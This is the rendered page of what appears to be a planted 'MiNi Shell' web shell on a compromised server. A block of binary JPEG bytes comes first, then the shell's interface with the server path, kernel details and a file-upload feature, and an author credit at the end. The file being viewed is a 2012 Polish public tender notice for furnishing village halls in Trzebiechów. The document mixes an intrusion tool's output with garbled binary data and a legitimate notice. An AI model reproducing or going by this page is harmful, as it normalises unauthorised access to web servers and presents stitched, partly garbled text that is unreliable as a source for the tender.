JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120419/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120419/125444-N-2012.html

<p class="kh_header"><b>Trzebiechów: Wyposażenie sal wiejskich w m. Borek, Mieszkowo, Trzebiechów</b><br>
<b>Numer ogłoszenia: 125444 - 2012; data zamieszczenia: 19.04.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Trzebiechów , ul. Sulechowska 2, 66-132 Trzebiechów, woj. lubuskie, tel. 068 3514122, 3514131, faks 068 3514122.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.trzebiechow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wyposażenie sal wiejskich w m. Borek, Mieszkowo, Trzebiechów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> stoły drewniane	szt	18,00
krzesła typ Karol	szt	108,00
ławostoły	szt	4,00
parasole	szt	4,00
kuchnia gazowo - elektr. 	kpl.	1,00
meble kuchenne + zlewozmywaki	kpl.	1,00
kuchenka mikrofalowa	szt	1,00
stół kuchenny	szt	2,00
taborety kuchenne	szt	4,00
zastawa stołowa kpl dla 12 osób	kpl.	9,00
zestaw sztućców kpl dla 12 osób	kpl.	9,00
patelnia elektryczna	szt	1,00
garnki nierdzewne z pokrywką 	kpl.	1,00
brytfanna	szt	2,00
patelnia 	szt	2,00
rondel 	szt	1,00
cedzak 	szt	1,00
noże kuchenne, tasaki	szt	5,00
czajnik elektryczny	szt	3,00
czajnik z gwizdkiem	szt	2,00
okap kuchenny	szt	1,00
deski do krojenia	szt	4,00
szklanki 	szt	120,00
Literatki	szt	120,00
kosze na śmieci zewn.	szt	2,00
kosze na śmieci wew.	szt	5,00
karnisze na firany	szt	7,00
firany 	mb	33,00
cukiernica	szt	14,00
filiżanki kpl 12 szt.	kpl.	9,00
maszynka do mięsa	szt	1,00
chochle i nabierki	szt	4,00
chłodziarko zamrażarka	szt	2,00
zmywarko wyparzarka	szt	1,00
krajalnica	szt	1,00
tłuczek do mięsa	szt	2,00
patery na ciasto	szt	14,00
miski do sałatek	szt	14,00
serwetniki	szt	14,00
zestaw do sprzątania	szt	1,00
lustro	szt	4,00
pojemniki na ręczniki papierowe	szt	2,00
pojemnik na mydło	szt	2,00
pojemnik na papier toaletowy	szt	4,00
kosz do toalet	szt	2,00
obrusy 	szt	36,00
Wieszak ubraniowy  ścienny 2mb	szt	1,00
Blat na półkę 	szt	1,00
Blat na półkę 	szt	1,00
		
stoły drewniane 	szt	10,00
krzesła typ Karol	szt	40,00
ławostoły	szt	4,00
parasole	szt	4,00
kuchna gazowo - elektr. 4 palnikowa, butla, reduktor kpl	kpl.	1,00
meble kuchenne + zlewozmywak	kpl.	1,00
kuchenka mikrofalowa	szt	1,00
stół kuchenny	szt	1,00
taborety kuchenne	szt	4,00
zastawa stołowa kpl dla 12 osób	kpl.	4,00
zestaw sztućców kpl dla 12 osób	kpl.	4,00
patelnia elektryczna	szt	1,00
garnki nierdzewne z pokrywką 	kpl.	1,00
brytfanna	szt	1,00
patelnia 	szt	1,00
rondel	szt	1,00
cedzak 	szt	1,00
noże kuchenne, tasaki	szt	4,00
czajnik elektryczny	szt	2,00
czajnik z gwizdkiem	szt	1,00
okap kuchenny	szt	1,00
deski do krojenia	szt	2,00
szklanki 	szt	42,00
Literatki 	szt	42,00
kosze na śmieci zewn.	szt	1,00
kosze na śmieci wew.	szt	1,00
karnisze na firany	szt	2,00
firany mb	mb	8,00
cukiernica	szt	4,00
filiżanki kpl 12 szt.	kpl.	4,00
maszynka do mięsa	szt	1,00
chochle i nabierki	szt	2,00
chłodziarko zamrażarka	szt	1,00
zmywarko wyparzarka	szt	1,00
krajalnica	szt	1,00
tłuczek do mięsa	szt	1,00
patery na ciasto	szt	3,00
miski do sałatek	szt	2,00
serwetniki	szt	4,00
zestaw do sprzątania	szt	1,00
lustro	szt	1,00
pojemniki na ręczniki papierowe	szt	1,00
pojemnik na mydło	szt	1,00
pojemnik na papier toaletowy	szt	1,00
kosz do toalet	szt	1,00
obrus 	szt	20,00
wieszak ubraniowy ścienny 	szt	1,00
		
Stoły drewniane	szt.	6,00
krzesła typ Karol	szt.	24,00
szafki kuchenne	kpl.	1,00
kuchenka mikrofalowa	szt.	1,00
czajnik elektryczny	szt.	1,00
zastawa stołowa kpl dla 12 osób	kpl.	2,00
sztućce kpl. 12 osób	kpl.	2,00
kuchenka gazowa 4 palnikowa z butlą i reduktorem	kpl.	1,00
Kino domowe	kpl.	1,00
telewizor LCD 37 z uchwytem ściennym	kpl.	1,00
szklanki 	szt.	24,00
literatki	szt.	24,00
obrusy plamoodporne	szt.	12,00
kosze na śmieci wewnętrzne	szt.	5,00
zestaw do sprzątania	kpl.	1,00
Garnki nierdzewnw z pokrywką, czajnik z gwizdkiem	kpl.	1,00
patery na ciasto	szt.	6,00
dzbanki na sok	szt.	6,00
półmiski duży + mały	kpl.	6,00
apteczka z wyposażeniem	kpl.	1,00
wyposażenie sanitariatów	kpl.	1,00
miski do sałatek	szt	6,00
komplet do przypraw	szt.	6,00.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 32.30.00.00-6, 39.00.00.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 11.06.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Warunkiem uczestnictwa w przetargu jest wniesienie wadium w wysokości 2.000 zł, słownie: dwa tysiące 00-100 złotych

Wykonawca powinien wnieść wadium przed terminem składania ofert, na cały okres związania ofertą.
 Wadium może być wnoszone w:
   - formie przelewu bankowego na konto: 82 1500 1810 1218 1003 2666 0000
z dopiskiem ,Wadium - przetarg Wyposażenie sal wiejskich w m. Borek, Mieszkowo, Trzebiechów; - decyduje data uznania kwoty wadium na rachunku zamawiającego,
 -	gwarancjach ubezpieczeniowych oraz poręczeniach i gwarancjach bankowych (gwarancje muszą być bezwarunkowe i na każde żądanie Zamawiającego)
         -  w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust.5 pkt 2             ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju             Przedsiębiorczości (tj. Dz. U. z 2007 Nr 42 poz. 275 z późn. zm.),

Oryginał dokumentu (gwarancji, poręczenia itp.) należy złożyć w kasie Urzędu Gminy Trzebiechów ul. Sulechowska 2, 66-132 Trzebiechów.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>przez co należy rozumieć, że wykonali oni w okresie ostatnich 5 lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie przynajmniej 2 dostaw wyposażenia składających się z mebli oraz urządzeń AGD o wartości min. 100 000 złotych</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza w uzasadnionych przypadkach wprowadzenie następujących zmian w zapisach umowy:
- zmiana osób dokonujących przyjęcia i odbioru dostaw ze strony Zamawiajacego,
- zmiana osób reprezentujących wykonawcę ,
- zmiana terminu realizacji zadania, z uwagi na czynniki których nie można było przewidzieć w dniu sporządzania SIWZ.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.trzebiechow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> ul. Sulechowska 2
66-132 Trzebiechów.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.04.2012 godzina 10:00, miejsce: ul. Sulechowska 2
66-132 Trzebiechów.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Program Rozwoju Obszarów Wiejskich.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com